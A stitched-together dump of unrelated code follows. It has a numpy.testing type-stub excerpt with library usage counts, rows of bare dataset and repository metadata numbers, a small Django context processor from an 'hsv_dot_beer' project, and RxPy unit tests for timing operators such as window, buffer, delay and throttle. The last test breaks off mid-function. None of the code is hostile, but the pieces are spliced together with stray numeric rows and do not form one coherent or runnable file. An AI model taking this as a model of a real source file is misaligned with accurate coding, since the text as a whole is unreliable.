"""
usage.matplotlib: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"], Literal["y"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x"], Literal["y"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x", "y"]]], Tuple[None, ...]],
desired: Tuple[List[Tuple[Literal["x", "y"]]], Tuple[None, ...]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[List[Tuple[Literal["x"]]], Tuple[Literal["y"]]],
desired: Tuple[List[Tuple[Literal["x"]]], Tuple[Literal["y"]]],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
List[Tuple[Literal["x"]]], List[Tuple[Union[Literal["y"], None], ...]]
],
desired: Tuple[
List[Tuple[Literal["x"]]], List[Tuple[Union[Literal["y"], None], ...]]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
List[Tuple[Union[None, Literal["c", "b", "a", "d"]], ...]],
Tuple[Literal["d"], Literal["e"]],
],
desired: Tuple[
List[Tuple[Union[None, Literal["c", "b", "a", "d"]], ...]],
Tuple[Literal["d"], Literal["e"]],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: numpy.ndarray):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.bool_):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], numpy.int64], Tuple[numpy.ndarray]],
]
],
desired: List[
Tuple[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], int], Tuple[numpy.ndarray]],
]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
]
],
desired: List[
Tuple[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
]
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], numpy.int64], Tuple[numpy.ndarray]],
],
desired: Dict[
Tuple[Literal["y"], int],
Tuple[Callable, Tuple[Literal["x"], int], Tuple[List[int]]],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, numpy.int64],
Tuple[slice[None, None, None], numpy.ndarray],
],
],
desired: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], int, int],
Tuple[slice[None, None, None], List[int]],
],
],
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
],
desired: Dict[
Tuple[Literal["y"], int, int],
Tuple[
Callable,
Tuple[Literal["x"], numpy.int64, int],
Tuple[numpy.ndarray, slice[None, None, None]],
],
],
):
"""
usage.dask: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, float, float], desired: Tuple[int, float, float]):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, float, float], desired: Tuple[int, int, float, float]
):
"""
usage.dask: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[
Dict[
Literal["kernel", "gamma", "C", "degree"],
Union[Literal["rbf", "poly"], float, int],
]
],
],
],
desired: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[
Dict[
Literal["kernel", "gamma", "C", "degree"],
Union[Literal["rbf", "poly"], float, int],
]
],
],
],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[Dict[Literal["C", "gamma"], numpy.float64]],
],
],
desired: Dict[
str,
Union[
numpy.ndarray,
numpy.ma.core.MaskedArray,
List[Dict[Literal["C", "gamma"], numpy.float64]],
],
],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: Dict[
str,
Union[
numpy.ndarray, numpy.ma.core.MaskedArray, List[Dict[Literal["C"], float]]
],
],
desired: Dict[
str,
Union[
numpy.ndarray, numpy.ma.core.MaskedArray, List[Dict[Literal["C"], float]]
],
],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_equal(
actual: List[Tuple[numpy.ndarray, numpy.ndarray]],
desired: List[Tuple[numpy.ndarray, numpy.ndarray]],
):
"""
usage.sklearn: 19
"""
...
def assert_equal(
actual: object, desired: object, err_msg: Union[int, str] = ..., verbose: bool = ...
):
"""
usage.dask: 26
usage.matplotlib: 12
usage.scipy: 4569
usage.skimage: 630
usage.sklearn: 27
usage.xarray: 40
"""
...
@overload
def assert_no_warnings():
"""
usage.skimage: 1
"""
...
@overload
def assert_no_warnings(*args: Literal["v", "t"]):
"""
usage.sklearn: 1
"""
...
def assert_no_warnings(*args: Literal["v", "t"]):
"""
usage.skimage: 1
usage.sklearn: 1
"""
...
def assert_string_equal(actual: str, desired: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(warning_class: Type[UserWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 2
usage.skimage: 3
"""
...
@overload
def assert_warns(warning_class: Type[FutureWarning], *args: Literal["v", "t"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_warns(warning_class: Type[RuntimeWarning]):
"""
usage.skimage: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.cluster.hierarchy.ClusterWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[numpy.ComplexWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.linalg._matfuncs_inv_ssq.LogmExactlySingularWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.linalg._matfuncs_inv_ssq.LogmNearlySingularWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.odr.odrpack.OdrWarning], *args: Literal["v", "t"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.optimize.optimize.OptimizeWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.optimize.linesearch.LineSearchWarning],
*args: Literal["v", "t"],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[DeprecationWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_warns(warning_class: Type[scipy.optimize.optimize.OptimizeWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[RuntimeWarning], *args: Literal["v", "t"]):
"""
usage.scipy: 6
"""
...
@overload
def assert_warns(warning_class: Type[numpy.VisibleDeprecationWarning]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.PearsonRConstantInputWarning]):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(
warning_class: Type[scipy.stats.stats.PearsonRNearConstantInputWarning],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.SpearmanRConstantInputWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.F_onewayConstantInputWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(warning_class: Type[scipy.stats.stats.F_onewayBadInputSizesWarning]):
"""
usage.scipy: 3
"""
...
@overload
def assert_warns(
warning_class: Type[sklearn.exceptions.ConvergenceWarning], *args: Literal["v", "t"]
):
"""
usage.sklearn: 1
"""
...
def assert_warns(
warning_class: Union[Type[sklearn.exceptions.ConvergenceWarning], type],
*args: Literal["v", "t"],
):
"""
usage.scipy: 39
usage.skimage: 5
usage.sklearn: 1
"""
...
class suppress_warnings:
@overload
def filter(self, /, message: str):
"""
usage.scipy: 7
"""
...
@overload
def filter(self, /, category: Type[DeprecationWarning]):
"""
usage.scipy: 5
"""
...
@overload
def filter(
self, /, category: Type[RuntimeWarning], message: Literal["divide by zero"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(self, /, category: Type[RuntimeWarning], message: str):
"""
usage.scipy: 7
"""
...
@overload
def filter(self, /, message: Literal["Got unexpected kwarg"]):
"""
usage.scipy: 1
"""
...
@overload
def filter(
self, /, category: Type[DeprecationWarning], message: Literal[".*frechet_"]
):
"""
usage.scipy: 5
"""
...
@overload
def filter(
self, /, category: Type[UserWarning], message: Literal["p-value floored"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(
self, /, category: Type[UserWarning], message: Literal["p-value capped"]
):
"""
usage.scipy: 2
"""
...
@overload
def filter(self, /, category: Type[UserWarning], message: str):
"""
usage.scipy: 6
"""
...
def filter(self, /, category: type = ..., message: str = ...):
"""
usage.scipy: 37
"""
...
@overload
def record(self, /, message: str):
"""
usage.scipy: 1
"""
...
@overload
def record(self, /, message: Literal["Got unexpected kwarg"]):
"""
usage.scipy: 1
"""
...
def record(self, /, message: str):
"""
usage.scipy: 2
"""
...
| 16.199742
| 88
| 0.579712
| 43,331
| 376,563
| 4.931296
| 0.018624
| 0.096706
| 0.181713
| 0.10732
| 0.962874
| 0.949461
| 0.936797
| 0.922926
| 0.899821
| 0.849746
| 0.000003
| 0.028724
| 0.247982
| 376,563
| 23,244
| 89
| 16.200439
| 0.725809
| 0.113107
| 0
| 0.80867
| 0
| 0
| 0.047989
| 0
| 0
| 0
| 0
| 0
| 0.202719
| 1
| 0.203867
| false
| 0
| 0.000088
| 0
| 0.204044
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
79e8fd6a6e73a7c2ce2be58a0981b331b5ef3dfd
| 187
|
py
|
Python
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 18
|
2018-12-06T01:46:37.000Z
|
2021-10-17T10:37:17.000Z
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 194
|
2018-11-04T12:50:49.000Z
|
2022-01-06T22:43:43.000Z
|
hsv_dot_beer/context_processors.py
|
hsv-dot-beer/hsvdotbeer
|
e1a086e99f75a30a9ebf6745e7229d6e688dd346
|
[
"Apache-2.0"
] | 7
|
2019-03-18T05:36:06.000Z
|
2020-12-25T03:27:29.000Z
|
from django.conf import settings
from django.http import HttpRequest
def add_al_dot_beer_to_context(request: HttpRequest):
return {"alabama_dot_beer": settings.IS_ALABAMA_DOT_BEER}
| 26.714286
| 61
| 0.828877
| 28
| 187
| 5.178571
| 0.642857
| 0.144828
| 0.193103
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106952
| 187
| 6
| 62
| 31.166667
| 0.868263
| 0
| 0
| 0
| 0
| 0
| 0.085562
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
79eb636dbd039975998680afbabe8ab93ca17af5
| 89,812
|
py
|
Python
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 78
|
2015-01-22T23:57:01.000Z
|
2021-06-04T15:16:22.000Z
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2015-10-19T12:59:57.000Z
|
2015-10-19T12:59:57.000Z
|
tests/test_observable_time.py
|
rlugojr/RxPy
|
9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec
|
[
"ECL-2.0",
"Apache-2.0"
] | 11
|
2015-02-16T20:43:45.000Z
|
2018-05-30T11:46:50.000Z
|
import logging
from datetime import datetime, timedelta
from rx import Observable
from rx.testing import TestScheduler, ReactiveTest, is_prime, MockDisposable
from rx.disposables import Disposable, SerialDisposable
FORMAT = '%(asctime)-15s %(threadName)s %(message)s'
logging.basicConfig(filename='rx.log', format=FORMAT, level=logging.DEBUG)
#logging.basicConfig(format=FORMAT, level=logging.DEBUG)
log = logging.getLogger('Rx')
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
def test_window_with_time_or_count_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def projection(w, i):
def inner_proj(x):
log.info("%s %s" % (i, x))
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"), on_next(420, "3 8"), on_next(470, "4 9"), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_or_count_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
def projection(w, i):
def inner_proj(x):
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"), on_next(420, "3 8"), on_next(470, "4 9"), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_window_with_time_or_count_disposed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
def projection(w, i):
def inner_proj(x):
return "%s %s" % (i, x)
return w.select(inner_proj)
return xs.window_with_time_or_count(70, 3, scheduler).select(projection).merge_observable()
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(205, "0 1"), on_next(210, "0 2"), on_next(240, "0 3"), on_next(280, "1 4"), on_next(320, "2 5"), on_next(350, "2 6"), on_next(370, "2 7"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_buffer_with_time_or_count_basic():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"), on_next(440, "8"), on_next(510, "9"), on_next(580, ""), on_next(600, ""), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_or_count_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"), on_next(440, "8"), on_next(510, "9"), on_next(580, ""), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_or_count_disposed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(205, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(370, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time_or_count(70, 3, scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(240, "1,2,3"), on_next(310, "4"), on_next(370, "5,6,7"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_oneshot_timer_timespan_basic():
scheduler = TestScheduler()
def create():
return Observable.timer(duetime=300, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(500, 0), on_completed(500))
def test_oneshot_timer_timespan_zero():
scheduler = TestScheduler()
def create():
return Observable.timer(0, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(201, 0), on_completed(201))
def test_oneshot_timer_timespan_negative():
scheduler = TestScheduler()
def create():
return Observable.timer(-1, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(201, 0), on_completed(201))
def test_oneshot_timer_timespan_disposed():
scheduler = TestScheduler()
def create():
return Observable.timer(1000, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_oneshot_timer_timespan_observer_throws():
scheduler1 = TestScheduler()
xs = Observable.timer(1, scheduler=scheduler1)
xs.subscribe(lambda x: _raise("ex"))
try:
return scheduler1.start()
except RxException:
pass
scheduler2 = TestScheduler()
ys = Observable.timer(1, period=None, scheduler=scheduler2)
ys.subscribe(on_completed=lambda: _raise("ex"))
try:
return scheduler2.start()
except RxException:
pass
def test_interval_timespan_basic():
scheduler = TestScheduler()
def create():
return Observable.interval(100, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 0), on_next(400, 1), on_next(500, 2), on_next(600, 3), on_next(700, 4), on_next(800, 5), on_next(900, 6))
def test_interval_timespan_zero():
scheduler = TestScheduler()
def create():
return Observable.interval(0, scheduler=scheduler)
results = scheduler.start(create, disposed=210)
results.messages.assert_equal(on_next(201, 0), on_next(202, 1), on_next(203, 2), on_next(204, 3), on_next(205, 4), on_next(206, 5), on_next(207, 6), on_next(208, 7), on_next(209, 8))
def test_interval_timespan_negative():
scheduler = TestScheduler()
def create():
return Observable.interval(-1, scheduler=scheduler)
results = scheduler.start(create, disposed=210)
results.messages.assert_equal(on_next(201, 0), on_next(202, 1), on_next(203, 2), on_next(204, 3), on_next(205, 4), on_next(206, 5), on_next(207, 6), on_next(208, 7), on_next(209, 8))
def test_interval_timespan_disposed():
scheduler = TestScheduler()
def create():
return Observable.interval(1000, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_interval_timespan_observer_throws():
scheduler = TestScheduler()
xs = Observable.interval(1, scheduler=scheduler)
xs.subscribe(lambda x: _raise("ex"))
try:
return scheduler.start()
except RxException:
pass
def test_delay_timespan_simple1():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
return xs.delay(100, scheduler=scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(350, 2), on_next(450, 3), on_next(550, 4), on_completed(650))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple1_impl():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
dt = datetime.fromtimestamp(300/1000)
return xs.delay(dt, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(350, 2), on_next(450, 3), on_next(550, 4), on_completed(650))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_simple2_impl():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
return xs.delay(50, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 2), on_next(400, 3), on_next(500, 4), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple2_impl():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
return xs.delay(datetime.fromtimestamp(250/1000), scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 2), on_next(400, 3), on_next(500, 4), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_simple3_impl():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
return xs.delay(150, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_next(600, 4), on_completed(700))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_simple3_impl():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_completed(550))
def create():
return xs.delay(datetime.fromtimestamp(0.350), scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_next(600, 4), on_completed(700))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_error1_impl():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_error(550, ex))
def create():
return xs.delay(50, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 2), on_next(400, 3), on_next(500, 4), on_error(550, ex))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_error1_impl():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_error(550, ex))
def create():
return xs.delay(datetime.fromtimestamp(0.250), scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, 2), on_next(400, 3), on_next(500, 4), on_error(550, ex))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_timespan_error2_impl():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_error(550, ex))
def create():
return xs.delay(150, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_error(550, ex))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_datetime_offset_error2_impl():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(450, 4), on_error(550, ex))
def create():
return xs.delay(datetime.fromtimestamp(0.350), scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_next(400, 2), on_next(500, 3), on_error(550, ex))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_empty():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_completed(550))
def create():
return xs.delay(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(560))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_error(550, ex))
def create():
return xs.delay(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(550, ex))
xs.subscriptions.assert_equal(subscribe(200, 550))
def test_delay_never():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1))
def create():
return xs.delay(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
xs.subscriptions.assert_equal(subscribe(200, 1000))
def test_throttle_timespan_allpass():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4), on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8), on_completed(550))
def create():
return xs.throttle(40, scheduler)
results = scheduler.start(create)
return results.messages.assert_equal(on_next(290, 3), on_next(340, 4), on_next(390, 5), on_next(440, 6), on_next(490, 7), on_next(540, 8), on_completed(550))
def test_throttle_timespan_allpass_error_end():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4), on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8), on_error(550, ex))
def create():
return xs.throttle(40, scheduler)
results = scheduler.start(create)
return results.messages.assert_equal(on_next(290, 3), on_next(340, 4), on_next(390, 5), on_next(440, 6), on_next(490, 7), on_next(540, 8), on_error(550, ex))
def test_throttle_timespan_alldrop():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4), on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8), on_completed(550))
def create():
return xs.throttle(60, scheduler)
results = scheduler.start(create)
return results.messages.assert_equal(on_next(550, 8), on_completed(550))
def test_throttle_timespan_alldrop_error_end():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(200, 2), on_next(250, 3), on_next(300, 4), on_next(350, 5), on_next(400, 6), on_next(450, 7), on_next(500, 8), on_error(550, ex))
def create():
return xs.throttle(60, scheduler)
results = scheduler.start(create)
return results.messages.assert_equal(on_error(550, ex))
def test_throttle_timespan_some_drop():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(250, 2), on_next(350, 3), on_next(370, 4), on_next(421, 5), on_next(480, 6), on_next(490, 7), on_next(500, 8), on_completed(600))
def create():
return xs.throttle(50, scheduler)
results = scheduler.start(create)
return results.messages.assert_equal(on_next(300, 2), on_next(420, 4), on_next(471, 5), on_next(550, 8), on_completed(600))
def test_throttle_empty():
scheduler = TestScheduler()
def create():
return Observable.empty(scheduler).throttle(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(201))
def test_throttle_error():
ex = 'ex'
scheduler = TestScheduler()
def create():
return Observable.throw_exception(ex, scheduler).throttle(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal(on_error(201, ex))
def test_throttle_never():
scheduler = TestScheduler()
def create():
return Observable.never().throttle(10, scheduler)
results = scheduler.start(create)
results.messages.assert_equal()
def test_throttle_duration_delay_behavior():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2), on_next(350, 3), on_next(400, 4), on_completed(550))
ys = [scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99)), scheduler.create_cold_observable(on_next(20, 42), on_next(25, 99))]
def create():
def selector(x):
return ys[x]
return xs.throttle_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(250 + 20, 0), on_next(280 + 20, 1), on_next(310 + 20, 2), on_next(350 + 20, 3), on_next(400 + 20, 4), on_completed(550))
xs.subscriptions.assert_equal(subscribe(200, 550))
ys[0].subscriptions.assert_equal(subscribe(250, 250 + 20))
ys[1].subscriptions.assert_equal(subscribe(280, 280 + 20))
ys[2].subscriptions.assert_equal(subscribe(310, 310 + 20))
ys[3].subscriptions.assert_equal(subscribe(350, 350 + 20))
ys[4].subscriptions.assert_equal(subscribe(400, 400 + 20))
def test_throttle_duration_throttle_behavior():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, -1), on_next(250, 0), on_next(280, 1), on_next(310, 2), on_next(350, 3), on_next(400, 4), on_completed(550))
